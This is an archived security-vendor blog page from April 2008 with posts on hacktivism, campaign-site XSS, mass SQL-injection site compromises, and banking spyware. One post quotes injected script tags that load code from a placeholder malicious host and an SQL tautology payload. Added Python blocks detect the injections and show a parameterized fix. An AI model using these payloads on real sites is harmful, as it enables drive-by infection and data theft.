Monthly Archive for "April 2008"



Antivirus admin on 29 Apr 2008

‘Hacktivism’ Incidents Escalate, Become More Frequent

While most of the cyber crime activities that we see being conducted on the Internet are being driven by illicit financial incentives, there also appears to be a type of malicious activity being driven by other motivations altogether – “Hacktivism”.

Hacktivism is best explained as a combination of “hacking” and “activism”, traditionally rooted in cultural and/or geopolitical unrest. As Wikipedia defines it, Hacktivism is “…the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft, web site parodies, virtual sit-ins, virtual sabotage, and software development.”

In fact, Hacktivist incidents stretch back over 20 years, but only in the past couple of years have they become more frequent, and more devastatingly malicious.

The most notable incidents of regional Hacktivism were the Distributed Denial of Service (DDoS) attacks against government and corporate websites in Estonia in 2007, which actually began a worldwide dialog on the real threat of “Cyber Attacks” and the impact on national infrastructure.

However, the latest victims of Hacktivism appear to be several U.S. websites in Eastern Europe belonging to Radio Free Europe/Radio Liberty. It was reported Monday that “…the attack, which started on April 26, initially targeted the website of RFE/RL’s Belarus Service, but quickly spread to other sites…”

According to a statement on the Radio Free Europe/Radio Liberty website, RFE/RL had been “…hit before by denial-of-service attacks, but this attack was unprecedented in its scale, as RFE/RL websites received up to 50,000 fake hits every second.”

While incidents of Hacktivism are not new, they are beginning to become a lot more frequent — perhaps due to the availability of tools to conduct hacktivist mischief, but also perhaps due to the ubiquitous social networking mechanisms which can now be used to build consensus when times of cultural or political unrest present the opportunity.

In any event, Hacktivism is becoming a disturbing trend, and one which can have serious ripple effects that interfere with Internet operational continuity — sometimes in ways which we may not have even thought of yet.

“Fergie”, a.k.a. Paul Ferguson
Internet Security Intelligence
Advanced Threats Research


Antivirus admin on 29 Apr 2008

Obama-Clinton Battle Goes Online

Senators Hillary Clinton and Barack Obama battle it out on all fronts, literally. The tight contest, where until now no clear frontrunner has emerged, isn’t likely to be dictated by just the debates. So we see extra-political battles in different arenas. The Web would seem one likely sphere where the one hopeful nominee who dominates gains a lot.

The most recent Internet-related clash between these two involved redirection: one candidate’s Web site leads users to the site of the other. Users viewing Obama’s site were redirected to Clinton’s through an attack called cross-site scripting (XSS). Researchers were successful in reversing the attack, too, exploiting vulnerabilities and revealing these glitches to the site owners.

Internet-related incidents are not new in the coming U.S. presidential elections. TrendLabs, as early as November last year, reported on spamming activities that were seen as campaign materials for Ron Paul. Clinton herself was featured in a spam run that spewed malware into systems, turning them into bots to further spread spam.

This time, however, the cross-site scripting attacks are seen as benign as no malware was involved. With the increasing hype around spamming and other malicious activities, this might be a move driven by caution. Those who do it may have realized that malicious activities, once exposed, will inevitably taint individuals and their appearances to the media, or to everyone in general.

Researchers are still investigating how this type of attack could be used in more malicious criminal activity.


Antivirus admin on 29 Apr 2008

Oops, they did it again…

Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.

F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.

The infection code was a <script > tag that pointed to a malicious URL. What is new here is that these malicious tags were inserted inside the usual text tags <title > </title >. For example:
<title >My Website <script src=http://maliciousURL.com > </script > </title >
They were also inserted into <meta >, <a href= >, <div class="myclass" > and similar tags, for example:
<a href=http://goodURL <script src=http://maliciousURL > </script > >

An infected Web site would display its infection in the browser window title:

While neither <title > nor <meta > tags are supposed to support <script >, some browsers are tolerant of syntax errors and interpret script tags wherever they are placed.
Visitors to the affected Web sites are thus exposed to threats active on their systems.
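A site owner can check stored or served pages for the two placements described above. The following is an added example, not code from the original post: the regular expressions are a heuristic, and the sample pages and the .example host names are constructed.

```python
import re

# Content of <title>...</title>, which should only ever hold text.
TITLE_RE = re.compile(r"<title\b[^>]*>(.*?)</title\s*>", re.I | re.S)
# A <script> tag that opens before the enclosing start tag has been closed,
# e.g. <a href=http://good <script src=...> (group 2 is the script tag).
NESTED_RE = re.compile(r"<(meta|a|div)\b[^<>]*(<script\b[^>]*>)", re.I)
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)


def _src(script_tag):
    """Return the src value of a <script> start tag, or None for inline script."""
    m = SRC_RE.search(script_tag)
    return m.group(1) if m else None


def find_injected_scripts(html):
    """Return (location, script_src) pairs for <script> tags in places
    where a script tag never legitimately appears."""
    findings = []
    for title in TITLE_RE.finditer(html):
        for tag in SCRIPT_TAG_RE.finditer(title.group(1)):
            findings.append(("title", _src(tag.group(0))))
    for m in NESTED_RE.finditer(html):
        findings.append((m.group(1).lower(), _src(m.group(2))))
    return findings


# Constructed sample pages: one with both injection placements, one clean.
INFECTED = (
    '<html><head><title>My Website <script src=http://injected.example/x.js></script></title>\n'
    '<meta name="description" content="shop"></head>\n'
    '<body><a href=http://good.example/ <script src=http://injected.example/x.js></script>>home</a>\n'
    '<script src="/static/app.js"></script></body></html>'
)
CLEAN = (
    '<html><head><title>My Website</title></head>\n'
    '<body><div class="myclass"><a href="/about">About</a></div>\n'
    '<script src="/static/app.js"></script></body></html>'
)

if __name__ == "__main__":
    for location, src in find_injected_scripts(INFECTED):
        print(f"script tag inside <{location}>: src={src}")
```

The legitimate script tag at the end of the body is not reported, because it sits outside any title and after its neighbouring tags have been closed.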

The massive infection of Web sites was supposedly done through automated SQL injection. This is not the first instance of this type of attack; unfortunately, it will not be the last either.

What’s notable about SQL injections is that such attacks can be triggered at any time, regardless of the patch level of the SQL server behind the site. The success of the attack depends on the Web application that uses the SQL server. A Web site with no field content control is pretty easy to fool into sending a simple SQL command to the server. To simplify:

“SELECT * FROM bank_data WHERE Userid=blah or 1=1”

The moral of this story is that cyber criminals will have an easy game as long as Web sites are made by construction kit users or by inexperienced developers who may not consider field content checking.
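The simplified query above, shown as the concatenating lookup beside a field content check and a bound parameter. This is an added example, not code from the original post: the in-memory SQLite table, its rows and the function names are assumptions, and the field value "0 or 1=1" stands in for the post's "blah or 1=1" because the Userid column here is numeric.

```python
import sqlite3


def open_demo_db():
    """In-memory stand-in for the bank_data table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE bank_data "
               "(Userid INTEGER PRIMARY KEY, owner TEXT, balance INTEGER)")
    db.executemany("INSERT INTO bank_data VALUES (?, ?, ?)",
                   [(1, "alice", 1200), (2, "bob", 50), (3, "carol", 9000)])
    return db


def lookup_concatenated(db, userid_field):
    # Vulnerable pattern: the form field becomes part of the SQL text itself,
    # so "0 or 1=1" rewrites the WHERE clause.
    sql = "SELECT * FROM bank_data WHERE Userid=" + userid_field
    return db.execute(sql).fetchall()


def valid_userid(userid_field):
    # Field content check: this field may only hold a short run of ASCII digits.
    return (userid_field.isascii() and userid_field.isdigit()
            and len(userid_field) <= 9)


def lookup_parameterized(db, userid_field):
    # Bound parameter: the value travels as data and is never parsed as SQL.
    sql = "SELECT * FROM bank_data WHERE Userid=?"
    return db.execute(sql, (userid_field,)).fetchall()


if __name__ == "__main__":
    db = open_demo_db()
    field = "0 or 1=1"  # constructed form input
    print("concatenated :", lookup_concatenated(db, field))
    print("content check:", valid_userid(field))
    print("parameterized:", lookup_parameterized(db, field))
```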

Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.


Uncategorized admin on 29 Apr 2008

Untangle OEMs Kaspersky Lab’s Market-Leading Anti-Virus Software

SAN MATEO, Calif. - Untangle today announced an OEM agreement with Kaspersky Lab, a leading developer of secure content management solutions and winner of last summer's Anti-Virus Fight Club. The agreement enables Untangle customers to protect their network endpoints by deploying the cutting edge Virus Blocker Powered by Kaspersky with just 1 click. "At Untangle, we're always looking for the best apps to offer our community. Every time we've tested anti-virus software, Kaspersky came out on top," said Untangle CTO, Dirk Morris. "Typica …

Antivirus admin on 28 Apr 2008

Sus/Mdrop-C


Antivirus on 28 Apr 2008

Microsoft Finally Stays on Message About Services - PC World

Microsoft Finally Stays on Message About Services
PC World - Apr 28, 2008
The deadline Microsoft gave Yahoo for making a deal or facing a proxy fight came and went this weekend without a word from either party.

Antivirus admin on 28 Apr 2008

Rock Phishers Up the Ante with More ‘Digital Certificates’

Our friends from RSA have recently reported about the latest one-two punch employed by the infamous Rock Phish gang (also reported here and here). Best known for their easy-to-use kits that yield professional looking phishing pages, Rock Phish now introduces information-stealing malware — dubbed as the Zeus Trojan.

This attack is reminiscent of the Bank of America phishing attack, which we reported several days ago, wherein users are prompted to install a “digital certificate” in order to access the bank’s online login page. Incidentally, the phishing page was also Rock Phish.

And apparently there were more: Trend Micro Advanced Threats Researcher Paul Ferguson and the TrendLabs Content Security team came across a couple of malicious “certificates” detected as TSPY_PAPRAS.AC and TSPY_PAPRAS.AD. These spyware each target the Comerica and Colonial banks, respectively.

Below are screenshots of the phishing email and Web page targeting Comerica account holders:

Comerica email

Comerica certificate page

Traditional phishing involves phishers sending out email messages that lead users to a fake Web site resembling login pages of certain institutions or companies. This time they’ve made sure they can get sensitive user information even without getting users to log on to some fake page. They do this by planting a spy in users’ systems so any relevant user action can be transmitted to a remote server. Unprotected users thus stand to lose sensitive information.

This recent development makes it even more important to remind users to be wary of clicking links in email communications, and to keep scanning engines up-to-date.

Additional text by Paul Oliveria


Antivirus admin on 27 Apr 2008

Malware Modification Contest Has Antivirus Vendors Upset - Slashdot

Malware Modification Contest Has Antivirus Vendors Upset
Slashdot - Apr 27, 2008
SkiifGeek writes "Race to Zero, a sideline competition being set up at this year's DefCon, already has some Antivirus vendors steaming over the objectives

Antivirus admin on 25 Apr 2008

Computer virus fighter McAfee to speak at Roanoke, his alma mater - roanoke.com

The founder of the world's first computer virus scanner will give the keynote address at Roanoke College's graduation ceremony on May 3. John McAfee, founder of McAfee Inc. and a 1967 graduate of Roanoke College, will address about 429 graduates at the 10 a.m. ceremony on the John Turbyfill Quadrangle. If it rains, the ceremony will be moved indoors to the Bast Center. McAfee will also receive an honorary doctor of science degree at the ceremony. After graduating, McAfee worked with a number of technology companies, including General Ele …

Antivirus admin on 25 Apr 2008

Race to Zero aims to stump antivirus scanners - CNET News.com

Race to Zero aims to stump antivirus scanners
CNET News.com, CA - Apr 25, 2008
A new contest to be held at this year's DefCon in Las Vegas in August hopes to prove that signature-based antivirus is dead, a move that one leading
